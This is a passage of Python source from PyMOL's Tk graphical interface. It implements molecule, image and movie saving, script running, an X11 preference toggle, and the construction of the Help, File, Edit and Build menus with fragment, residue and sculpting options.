if multiple_files_flag == "one file" and len(sels)>=1:
sfile = '_'.join(sels) if len(sels) < 3 else \
sels[0] + '-and-%d-more' % (len(sels) - 1)
sfile = asksaveasfilename(defaultextension = _def_ext(".pdb"),
initialfile = sfile,
initialdir = self.initialdir,
filetypes=filetypes_save)
if len(sfile):
# maybe use PDBSTRs for saving multiple files to multiple states
self.initialdir = os.path.dirname(sfile)
save_sele = ' or '.join(["("+str(x)+")" for x in sels])
self.cmd.log("save %s,(%s)\n"%(sfile,save_sele),
"cmd.save('%s','(%s)')\n"%(sfile,save_sele))
if state_flag == "all":
self.cmd.save(sfile,"(%s)"%save_sele,state=0,quiet=0)
elif state_flag == "object's current":
ap = 0
for sel in sels:
s = int(self.cmd.get("state", str(sel)))
self.cmd.multisave(sfile,str(sel),state=s, quiet=0, append=ap)
ap = 1
else:
self.cmd.save(sfile,"(%s)"%save_sele,quiet=0)
return
else:
# save to many files
for curName in sels:
## print "Result is: ", result
## print "Sels is: ", sels
## print "CurName is: ", curName
## print "State flag is: ", state_flag
# The only special case for saving files is when the user selects a multi-state object
# and wants to save that to multiple files, each state in one file.
doSplit=False
if state_flag=='all':
stateSave = "0"
if len(sels)==1:
# print "User wants to split a file"
doSplit=True
elif state_flag=='global':
stateSave = self.cmd.get_state()
elif state_flag=="object's current":
stateSave = int(self.cmd.get("state",curName))
# print "Saving curren't object's state as: ", stateSave
else: # default to current global
stateSave = "state=", self.cmd.get_state()
if True:
sfile = asksaveasfilename(defaultextension = _def_ext(".pdb"),
initialfile = curName,
initialdir = self.initialdir,
filetypes = filetypes_save)
# now save the file (customizing states as necessary)
# print "sfile is: ", sfile
if len(sfile):
# maybe use PDBSTRs for saving multiple files to multiple states
self.initialdir = os.path.dirname(sfile)
save_sele = str("("+curName+")")
if doSplit:
# save each state in "save_sele" to file "sfile" as 'sfile_stateXYZ.pdb'
s = self.cmd.count_states(save_sele)
for stateSave in range(1,int(s)+1):
save_file = sfile
# _state004
inter = "_state" + str(stateSave).zfill(len(str(s))+1)
                                    # if save_file already has an extension, insert the state suffix before it
                                    g = re.search(r"(.*)(\..*)$", save_file)
                                    if g is not None:
# 1PDB_state004.pdb
save_file = g.groups()[0] + inter + g.groups()[1]
else:
# user entered a file w/o an extension name: eg, '1abc'
# this saves to, '1abc_state00XYZ'
save_file = save_file + inter
self.cmd.log("save %s,(%s)\n"%(save_file,save_sele),
"cmd.save('%s','(%s)', state='%s')\n"%(save_file,save_sele,stateSave))
self.cmd.save(save_file,"(%s)"%save_sele,state=stateSave,quiet=0)
else:
save_file = sfile
# just save current selection to one file
self.cmd.log("save %s,(%s)\n"%(save_file,save_sele),
"cmd.save('%s','(%s)', state='%s')\n"%(save_file,save_sele,stateSave))
self.cmd.save(save_file,"(%s)"%save_sele,state=stateSave,quiet=0)
def edit_pymolrc(self):
from pmg_tk import TextEditor
TextEditor.edit_pymolrc(self)
def file_run(self):
ofile = askopenfilename(initialdir = os.getcwd(),
filetypes=[("All Runnable","*.pml"),
("All Runnable","*.pym"),
("All Runnable","*.py"),
("All Runnable","*.pyc"),
("PyMOL Script","*.pml"),
("Python Program","*.py"),
("Python Program","*.pyc"),
("PyMOL Program","*.pym"),
("All Files","*.*"),
("All Files","*"),
])
if len(ofile):
self.__script__ = ofile
            if re.search(r"\.pym*$|\.PYM*$", ofile):
                self.cmd.do("run "+ofile)
            else:
                self.cmd.do("@"+ofile)
def file_save_png(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".png"),
initialdir = self.initialdir,
filetypes=[("PNG File","*.png")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("png %s\n"%sfile,"cmd.png('%s')\n"%sfile)
self.cmd.png(sfile,quiet=0)
def file_save_wrl(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".wrl"),
initialdir = self.initialdir,
filetypes=[("VRML 2 WRL File","*.wrl")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s\n"%sfile,"cmd.save('%s')\n"%sfile)
self.cmd.save(sfile,quiet=0)
def file_save_dae(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".dae"),
initialdir = self.initialdir,
filetypes=[("COLLADA File","*.dae")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s\n"%sfile,"cmd.save('%s')\n"%sfile)
self.cmd.save(sfile,quiet=0)
def file_save_pov(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".pov"),
initialdir = self.initialdir,
filetypes=[("POV File","*.pov")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s\n"%sfile,"cmd.save('%s')\n"%sfile)
self.cmd.save(sfile,quiet=0)
def file_save_mpeg(self):
try:
from freemol import mpeg_encode
if not mpeg_encode.validate():
print("produce-error: Unable to validate freemol.mpeg_encode")
raise
except:
tkMessageBox.showerror("Error",
"MPEG encoder missing.\nThe FreeMOL add-ons may not be installed.")
return
else:
sfile = asksaveasfilename(defaultextension = _def_ext(".mpg"),
initialdir = self.initialdir,
filetypes=[("MPEG movie file","*.mpg")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
mQual = self.cmd.get_setting_int("movie_quality")
self.cmd.log("movie.produce %s,quality=%d,quiet=0\n"%(sfile,mQual),
"cmd.movie.produce('''%s''',quality=%d,quiet=0)\n"%(sfile,mQual))
self.cmd.movie.produce(sfile,quality=mQual, quiet=0) #quality=quality
def file_save_mpng(self):
sfile = asksaveasfilename(initialdir = self.initialdir,
filetypes=[("Numbered PNG Files","*.png")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("mpng %s\n"%sfile,"cmd.mpng('%s')\n"%sfile)
self.cmd.mpng(sfile,modal=-1)
def mvprg(self, command=None):
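        """Movie program helper: -1 deletes the last appended program, a command template (with a %d start placeholder) appends a new program at the end of the movie, and None re-runs the stored program."""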
if command != None:
if command == -1:
self.cmd.do("_ mdelete -1,%d"%self.movie_start)
command = None
else:
command = str(command)
self.movie_start = (self.cmd.get_movie_length()+1)
command = command % self.movie_start
self.movie_command = command
self.cmd.do("_ ending")
else:
command = self.movie_command
if command != None:
self.cmd.do(command)
def mvprg_scene_loop(self, pause, rock, angle):
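        """Return a callback that appends a scene loop (given per-scene pause, rock mode and sweep angle) at the current end of the movie."""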
def func():
cmd = self.cmd
start = cmd.get_movie_length() + 1
cmd.ending()
cmd.set('sweep_angle', angle)
cmd.movie.add_scenes(None, pause, rock=rock, start=start)
return func
def transparency_menu(self,name,label,setting_name):
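        """Add a cascade of preset transparency levels under the Transparency menu, bound to the given setting variable."""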
self.menuBar.addcascademenu('Transparency', name, label, label=label)
var = getattr(self.setting, setting_name)
for lab, val in [ ('Off', 0.0), ('20%', 0.2), ('40%', 0.4),
('50%', 0.5), ('60%', 0.6), ('80%', 0.8) ]:
self.menuBar.addmenuitem(name, 'radiobutton', label=lab, value=val, variable=var)
def cat_terms(self):
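        """Print the first license file found under $PYMOL_PATH, if any."""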
for path in [ "$PYMOL_PATH/LICENSE.txt", "$PYMOL_PATH/LICENSE.TXT", "$PYMOL_PATH/LICENSE" ]:
path = self.pymol.cmd.exp_path(path)
if os.path.exists(path):
print(open(path).read().strip())
return
print(" Error: no license terms found.")
def toggleClickThrough(self, toggle):
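        """Toggle X11 click-through and focus-follows-mouse on macOS via 'defaults write'; takes effect after restarting X11."""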
if toggle:
os.system(
"defaults write com.apple.x11 wm_click_through -bool true")
os.system(
"defaults write org.x.X11 wm_click_through -bool true")
os.system(
"defaults write com.apple.x11 wm_ffm -bool true")
os.system(
"defaults write org.x.X11 wm_ffm -bool true")
print("Enabled wm_click_through and wm_ffm.", end=' ')
else:
os.system(
"defaults write com.apple.x11 wm_click_through -bool false")
os.system(
"defaults write org.x.X11 wm_click_through -bool false")
os.system(
"defaults write com.apple.x11 wm_ffm -bool false")
os.system(
"defaults write org.x.X11 wm_ffm -bool false")
print("Disabled wm_click_through and wm_ffm.", end=' ')
print("Please restart X11.")
def createMenuBar(self):
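        """Build the Pmw menu bar: Help, File, Edit, Build, Movie, Display and the remaining application menus."""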
self.menuBar = Pmw.MenuBar(self.root, balloon=self.balloon,
hull_relief=RAISED, hull_borderwidth=1)
self.menuBar.pack(fill=X)
addmenuitem = self.menuBar.addmenuitem
addcascademenu = self.menuBar.addcascademenu
# self.menuBar.addmenu('Tutorial', 'Tutorial', side='right')
# self.menuBar.addmenuitem('Tutorial', 'command', 'Open tutorial data file.',
# label='Open File...',
# command=lambda s=self: s.file_open(tutorial=1))
# to come
# self.menuBar.addmenuitem('Tutorial', 'separator', '')
#
# self.menuBar.addmenuitem('Tutorial', 'command', 'Beginners',
# label='Beginners',
# command = lambda s=self: None)
self.menuBar.addmenu('Help', 'About %s' % self.appname, side='right')
try:
import webbrowser
browser_open = webbrowser.open
# workaround for problematic webbrowser module under Mac OS X
try:
if sys.platform == 'darwin':
browser_open = darwin_browser_open
except:
pass
self.menuBar.addmenuitem('Help', 'command', label='PyMOL Command Reference',
command=lambda: browser_open('http://pymol.org/pymol-command-ref.html'))
self.menuBar.addmenuitem('Help', 'separator', '')
self.menuBar.addmenuitem('Help', 'command',
'Access the Official PyMOL Documentation online',
label='Online Documentation',
command = lambda bo=browser_open:bo("http://pymol.org/dsc"))
self.menuBar.addcascademenu('Help', 'Topics', 'Topics',
label='Topics',tearoff=FALSE)
self.menuBar.addmenuitem('Topics', 'command',
'Introductory Screencasts',
label='Introductory Screencasts',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/media:intro"))
self.menuBar.addmenuitem('Topics', 'command',
'Core Commands',
label='Core Commands',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/command:core_set"))
self.menuBar.addmenuitem('Topics', 'separator', '')
self.menuBar.addmenuitem('Topics', 'command',
'Settings',
label='Settings',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/setting"))
self.menuBar.addmenuitem('Topics', 'command',
'Atom Selections',
label='Atom Selections',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/selection"))
self.menuBar.addmenuitem('Topics', 'command',
'Commands',
label='Commands',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/command"))
self.menuBar.addmenuitem('Topics', 'command',
'Launching',
label='Launching',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/launch"))
self.menuBar.addmenuitem('Topics', 'separator', '')
self.menuBar.addmenuitem('Topics', 'command',
'Concepts',
label='Concepts',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/concept"))
self.menuBar.addmenuitem('Topics', 'separator', '')
self.menuBar.addmenuitem('Topics', 'command',
'A.P.I. Methods',
label='A.P.I. Methods',
command = lambda bo=browser_open:bo("http://pymol.org/dsc/id/api"))
self.menuBar.addmenuitem('Help', 'separator', '')
self.menuBar.addmenuitem('Help', 'command',
'Access the community-maintained PyMOL Wiki',
label='PyMOL Community Wiki',
command = lambda bo=browser_open:bo("http://www.pymolwiki.org"))
self.menuBar.addmenuitem('Help', 'command',
'Join or browse the pymol-users mailing list',
label='PyMOL Mailing List',
command = lambda bo=browser_open:bo("https://lists.sourceforge.net/lists/listinfo/pymol-users"))
self.menuBar.addmenuitem('Help', 'command',
'Access the PyMOL Home Page',
label='PyMOL Home Page',
command = lambda bo=browser_open:bo("http://www.pymol.org"))
self.menuBar.addmenuitem('Help', 'separator', '')
self.menuBar.addmenuitem('Help', 'command',
'Email PyMOL Help',
label='Email PyMOL Help',
command = lambda bo=browser_open:bo("mailto:[email protected]?subject=PyMOL%20Question"))
self.menuBar.addmenuitem('Help', 'separator', '')
self.menuBar.addmenuitem('Help', 'command',
'Get information on application',
label='About PyMOL', command = lambda s=self:s.show_about())
if self.pymol.cmd.splash(2):
self.menuBar.addmenuitem('Help', 'command',
'Sponsor PyMOL by becoming a Subscriber',
label='Sponsorship Information',
command = lambda bo=browser_open:bo("http://pymol.org/funding.html"))
self.menuBar.addmenuitem('Help', 'command',
'Learn How to Cite PyMOL',
label='How to Cite PyMOL', command = lambda bo=browser_open:bo("http://pymol.org/citing"))
#self.menuBar.addmenuitem('Help', 'separator', '')
#self.menuBar.addmenuitem('Help', 'command',
# 'Output License Terms',
# label='Output License Terms',
# command = lambda s=self:s.cat_terms())
except ImportError:
pass
# self.menuBar.addmenuitem('Help', 'command', 'Release Notes',
# label='Release Notes',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('release')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on Commands',
# label='Commands',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('commands')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Launching',
# label='Launching',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('launching')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on Selections',
# label='Select Command',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('select')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Selections',
# label='Selection Syntax',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('selections')"))
# self.menuBar.addmenuitem('Help', 'command', 'Example Selections',
# label='Selection Examples',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('examples')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on the Mouse',
# label='Mouse',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('mouse')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on the Keyboard',
# label='Keyboard',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('keyboard')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Molecular Editing',
# label='Molecular Editing',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('editing')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Molecular Editing',
# label='Molecular Editing Keys',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('edit_keys')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Stereo',
# label='Stereo',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('stereo')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on the API',
# label='API',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('api')"))
self.toggleBalloonVar = IntVar()
self.toggleBalloonVar.set(0)
self.setting = Setting(self.app)
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'checkbutton',
# 'Toggle balloon help',
# label='Balloon help',
# variable = self.toggleBalloonVar,
# command=self.toggleBalloon)
self.menuBar.addmenu('File', 'File Input',tearoff=TRUE)
self.menuBar.addmenuitem('File', 'command', 'Open structure file.',
label='Open...',
command=self.file_open)
self.menuBar.addmenuitem('File', 'command', 'Save session.',
label='Save Session',
command=self.session_save)
self.menuBar.addmenuitem('File', 'command', 'Save session.',
label='Save Session As...',
command=self.session_save_as)
self.menuBar.addmenuitem('File', 'command', 'Save structure file.',
label='Save Molecule...',
command=self.file_save)
# self.menuBar.addmenuitem('File', 'command', 'Open sequential files.',
# label='Open Sequence...',
# command=self.file_open)
self.menuBar.addcascademenu('File', 'SaveImageAs', 'Save Image As',
label='Save Image As',tearoff=FALSE)
self.menuBar.addmenuitem('SaveImageAs', 'command', 'Save current image as PNG Image.',
label='PNG...',
command=self.file_save_png)
self.menuBar.addmenuitem('SaveImageAs', 'separator', '')
self.menuBar.addmenuitem('SaveImageAs', 'command', 'Save current image as VRML.',
label='VRML 2...',
command=self.file_save_wrl)
self.menuBar.addmenuitem('SaveImageAs', 'command', 'Save current image as COLLADA.',
label='COLLADA...',
command=self.file_save_dae)
self.menuBar.addmenuitem('SaveImageAs', 'command', 'Save current image as PovRay input.',
label='POV-Ray...',
command=self.file_save_pov)
self.menuBar.addcascademenu('File', 'SaveMovieAs', 'Save Movie As',
label='Save Movie As',tearoff=FALSE)
self.menuBar.addmenuitem('SaveMovieAs', 'command', 'Save all frames as an MPEG movie.',
label='MPEG...',
command=self.file_save_mpeg)
self.menuBar.addmenuitem('SaveMovieAs', 'separator', '')
self.menuBar.addmenuitem('SaveMovieAs', 'command', 'Save all frames as images.',
label='PNG Images...',
command=self.file_save_mpng)
self.menuBar.addmenuitem('File', 'separator', '')
addcascademenu('File', 'Logging', label='Log File')
addmenuitem('Logging', 'command', label='Open...', command=self.log_open)
addmenuitem('Logging', 'command', label='Resume...', command=self.log_resume)
addmenuitem('Logging', 'command', label='Append...', command=self.log_append)
addmenuitem('Logging', 'command', label='Close', command=self.cmd.log_close)
self.menuBar.addmenuitem('File', 'command', 'Run program or script.',
label='Run Script...',
command=self.file_run)
addcascademenu('File', 'WorkDir', label='Working Directory')
addmenuitem('WorkDir', 'command', label='Change...',
command=self.cd_dialog)
if sys.platform == 'darwin':
file_browser = lambda: self.cmd.system('open .')
elif sys.platform == 'win32':
file_browser = lambda: self.cmd.system('explorer .')
else:
file_browser = None
if file_browser:
addmenuitem('WorkDir', 'command', label='File Browser',
command=file_browser)
self.menuBar.addmenuitem('File', 'separator', '')
self.menuBar.addmenuitem('File', 'command', 'Edit pymolrc',
label='Edit pymolrc',
command=self.edit_pymolrc)
self.menuBar.addmenuitem('File', 'separator', '')
self.menuBar.addmenuitem('File', 'command', 'Quit PyMOL',
label='Quit',
command=self.confirm_quit)
addcascademenu('File', 'Reinit', label='Reinitialize')
addmenuitem('Reinit', 'command', label='Everything',
command=self.cmd.reinitialize)
addmenuitem('Reinit', 'command', label='Original Settings',
command=lambda: self.cmd.reinitialize('original_settings'))
addmenuitem('Reinit', 'command', label='Stored Settings',
command=lambda: self.cmd.reinitialize('settings'))
addmenuitem('Reinit', 'separator')
addmenuitem('Reinit', 'command', label='Store Current Settings',
command=lambda: self.cmd.reinitialize('store_defaults'))
self.menuBar.addmenu('Edit', 'Edit',tearoff=TRUE)
if sys.platform == 'win32':
if self.app.pymol.invocation.options.incentive_product:
self.menuBar.addmenuitem('Edit', 'command',
'Copy Image',
label='Copy Image to Clipboard',
command = lambda s=self:s.cmd.copy_image(quiet=0))
self.menuBar.addmenuitem('Edit', 'separator', '')
self.menuBar.addmenuitem('Edit', 'command', 'Undo',
label='Undo [Ctrl-Z]',
command = lambda s=self: s.cmd.do("_ undo"))
self.menuBar.addmenuitem('Edit', 'command', 'Redo',
label='Redo [Ctrl-Y]',
command = lambda s=self: s.cmd.do("_ redo"))
self.menuBar.addmenuitem('Edit', 'separator', '')
self.menuBar.addmenuitem('Edit', 'command',
'To Copy Text: Use Ctrl-C in TclTk GUI',
label='To copy text use Ctrl-C in the TclTk GUI',
state='disabled',
command = None)
self.menuBar.addmenuitem('Edit', 'command',
'To Paste Text, Use Ctrl-V in TclTk GUI',
                         label='To paste text use Ctrl-V in the TclTk GUI',
state='disabled',
command = None)
if sys.platform == 'win32':
if self.app.pymol.invocation.options.incentive_product:
self.menuBar.addmenuitem('Edit', 'separator', '')
self.menuBar.addmenuitem('Edit', 'checkbutton',
'Auto-Copy Images',
label='Auto-Copy Images',
variable = self.setting.auto_copy_images,
)
self.menuBar.addmenu('Build', 'Build',tearoff=TRUE)
self.menuBar.addcascademenu('Build', 'Fragment', 'Fragment',
label='Fragment',tearoff=TRUE)
# self.menuBar.addmenu('Fragment', 'Fragment')
self.menuBar.addmenuitem('Fragment', 'command', 'Acetylene',
label='Acetylene [Alt-J]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','acetylene',2,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Amide N->C',
label='Amide N->C [Alt-1]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','formamide',3,1)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Amide C->N',
label='Amide C->N [Alt-2]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','formamide',5,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Bromine',
label='Bromine [Ctrl-Shift-B]',
command = lambda s=self: s.cmd.do("_ replace Br,1,1"))
self.menuBar.addmenuitem('Fragment', 'command', 'Carbon',
label='Carbon [Ctrl-Shift-C]',
command = lambda s=self: s.cmd.do("_ replace C,4,4"))
self.menuBar.addmenuitem('Fragment', 'command', 'Carbonyl',
label='Carbonyl [Alt-0]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','formaldehyde',2,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Chlorine',
label='Chlorine [Ctrl-Shift-L]',
command = lambda s=self: s.cmd.do("_ replace Cl,1,1"))
self.menuBar.addmenuitem('Fragment', 'command', 'Cyclobutyl',
label='Cyclobutyl [Alt-4]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','cyclobutane',4,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Cyclopentyl',
label='Cyclopentyl [Alt-5]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','cyclopentane',5,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Cyclopentadiene',
label='Cyclopentadiene [Alt-8]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','cyclopentadiene',5,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Cyclohexyl',
label='Cyclohexyl [Alt-6]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','cyclohexane',7,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Cycloheptyl',
label='Cycloheptyl [Alt-7]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','cycloheptane',8,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Fluorine',
label='Fluorine [Ctrl-Shift-F]',
command = lambda s=self: s.cmd.do("_ replace F,1,1"))
self.menuBar.addmenuitem('Fragment', 'command', 'Iodine',
label='Iodine [Ctrl-Shift-I]',
command = lambda s=self: s.cmd.do("_ replace I,1,1"))
self.menuBar.addmenuitem('Fragment', 'command', 'Methane',
label='Methane [Ctrl-Shift-M]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','methane',1,0)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Nitrogen',
label='Nitrogen [Ctrl-Shift-N]',
command = lambda s=self: s.cmd.do("_ replace N,4,3"))
self.menuBar.addmenuitem('Fragment', 'command', 'Oxygen',
label='Oxygen [Ctrl-Shift-O]',
command = lambda s=self: s.cmd.do("_ replace O,4,2"))
self.menuBar.addmenuitem('Fragment', 'command', 'Phenyl',
label='Phenyl [Alt-9]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','benzene',6,0)"))
        self.menuBar.addmenuitem('Fragment', 'command', 'Sulfur',
                                label='Sulfur [Ctrl-Shift-S]',
command = lambda s=self: s.cmd.do("_ replace S,2,2"))
self.menuBar.addmenuitem('Fragment', 'command', 'Sulfonyl',
label='Sulfonyl [Alt-3]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_fragment('pk1','sulfone',3,1)"))
self.menuBar.addmenuitem('Fragment', 'command', 'Phosphorus',
label='Phosphorus [Ctrl-Shift-P]',
command = lambda s=self: s.cmd.do("_ replace P,4,3"))
# self.menuBar.addmenu('Residue', 'Residue')
self.menuBar.addcascademenu('Build', 'Residue', 'Residue',
label='Residue',tearoff=TRUE)
self.menuBar.addmenuitem('Residue', 'command', 'Acetyl',
label='Acetyl [Alt-B]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','ace')"))
self.menuBar.addmenuitem('Residue', 'command', 'Alanine',
label='Alanine [Alt-A]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','ala')"))
self.menuBar.addmenuitem('Residue', 'command', 'Amine',
label='Amine',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','nhh')"))
self.menuBar.addmenuitem('Residue', 'command', 'Aspartate',
label='Aspartate [Alt-D]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','asp')"))
self.menuBar.addmenuitem('Residue', 'command', 'Asparagine',
label='Asparagine [Alt-N]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','asn')"))
self.menuBar.addmenuitem('Residue', 'command', 'Arginine',
label='Arginine [Alt-R]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','arg')"))
self.menuBar.addmenuitem('Residue', 'command', 'Cysteine',
label='Cysteine [Alt-C]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','cys')"))
self.menuBar.addmenuitem('Residue', 'command', 'Glutamate',
label='Glutamate [Alt-E]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','glu')"))
self.menuBar.addmenuitem('Residue', 'command', 'Glutamine',
label='Glutamine [Alt-Q]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','gln')"))
self.menuBar.addmenuitem('Residue', 'command', 'Glycine',
label='Glycine [Alt-G]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','gly')"))
self.menuBar.addmenuitem('Residue', 'command', 'Histidine',
label='Histidine [Alt-H]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','his')"))
self.menuBar.addmenuitem('Residue', 'command', 'Isoleucine',
label='Isoleucine [Alt-I]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','ile')"))
self.menuBar.addmenuitem('Residue', 'command', 'Leucine',
label='Leucine [Alt-L]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','leu')"))
self.menuBar.addmenuitem('Residue', 'command', 'Lysine',
label='Lysine [Alt-K]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','lys')"))
self.menuBar.addmenuitem('Residue', 'command', 'Methionine',
label='Methionine [Alt-M]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','met')"))
self.menuBar.addmenuitem('Residue', 'command', 'N-Methyl',
label='N-Methyl [Alt-Z]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','nme')"))
self.menuBar.addmenuitem('Residue', 'command', 'Phenylalanine',
label='Phenylalanine [Alt-F]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','phe')"))
self.menuBar.addmenuitem('Residue', 'command', 'Proline',
label='Proline [Alt-P]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','pro')"))
self.menuBar.addmenuitem('Residue', 'command', 'Serine',
label='Serine [Alt-S]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','ser')"))
self.menuBar.addmenuitem('Residue', 'command', 'Threonine',
label='Threonine [Alt-T]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','thr')"))
self.menuBar.addmenuitem('Residue', 'command', 'Tryptophan',
label='Tryptophan [Alt-W]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','trp')"))
self.menuBar.addmenuitem('Residue', 'command', 'Tyrosine',
label='Tyrosine [Alt-Y]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','tyr')"))
self.menuBar.addmenuitem('Residue', 'command', 'Valine',
label='Valine [Alt-V]',
command = lambda s=self: s.cmd.do(
"_ editor.attach_amino_acid('pk1','val')"))
self.menuBar.addmenuitem('Residue', 'separator', '')
var = self.setting.secondary_structure
for lab, val in [
('Helix', 1),
('Antiparallel Beta Sheet', 2),
('Parallel Beta Sheet', 3),
]:
addmenuitem('Residue', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addmenuitem('Build', 'separator', '')
self.menuBar.addcascademenu('Build', 'Sculpting', 'Sculpting',
label='Sculpting',tearoff=TRUE)
self.menuBar.addmenuitem('Sculpting', 'checkbutton',
'Auto-Sculpt.',
label='Auto-Sculpting',
variable = self.setting.auto_sculpt,
)
self.menuBar.addmenuitem('Sculpting', 'checkbutton',
'Sculpting.',
label='Sculpting',
variable = self.setting.sculpting,
)
self.menuBar.addmenuitem('Sculpting', 'separator', '')
self.menuBar.addmenuitem('Sculpting', 'command', 'Activate',
label='Activate',
command = lambda s=self: s.cmd.do("_ sculpt_activate all"))
self.menuBar.addmenuitem('Sculpting', 'command', 'Deactivate',
label='Deactivate',
command = lambda s=self: s.cmd.do("_ sculpt_deactivate all"))
self.menuBar.addmenuitem('Sculpting', 'command', 'Clear Memory',
label='Clear Memory',
command = lambda s=self: s.cmd.do("_ sculpt_purge"))
self.menuBar.addmenuitem('Sculpting', 'separator', '')
addmenuitem('Sculpting', 'radiobutton', label='1 Cycle per Update', value=1,
variable=self.setting.sculpting_cycles)
for val in [3, 10, 33, 100, 333, 1000]:
addmenuitem('Sculpting', 'radiobutton', label='%d Cycles per Update' % val, value=val,
variable=self.setting.sculpting_cycles)
self.menuBar.addmenuitem('Sculpting', 'separator', '')
#define cSculptBond 0x01
#define cSculptAngl 0x02
#define cSculptPyra 0x04
#define cSculptPlan 0x08
#define cSculptLine 0x10
#define cSculptVDW 0x20
#define cSculptVDW14 0x40
#define cSculptTors 0x80
var = self.setting.sculpt_field_mask
for lab, val in [
('Bonds Only', 0x01),
('Bonds & Angles Only', 0x01+0x02),
('Local Geometry Only', 0x01+0x02+0x04+0x08+0x10),
('All Except VDW', 0x01+0x02+0x04+0x08+0x10+0x80),
('All Except 1-4 VDW & Torsions', 0x01+0x02+0x04+0x08+0x10+0x20),
('All Terms', 0xFF),
]:
addmenuitem('Sculpting', 'radiobutton', label=lab, value=val, variable=var)
self.menuBar.addmenuitem('Build', 'separator', '')
self.menuBar.addmenuitem('Build', 'command', 'Cycle Bond Valence',
label='Cycle Bond Valence [Ctrl-Shift-W]',
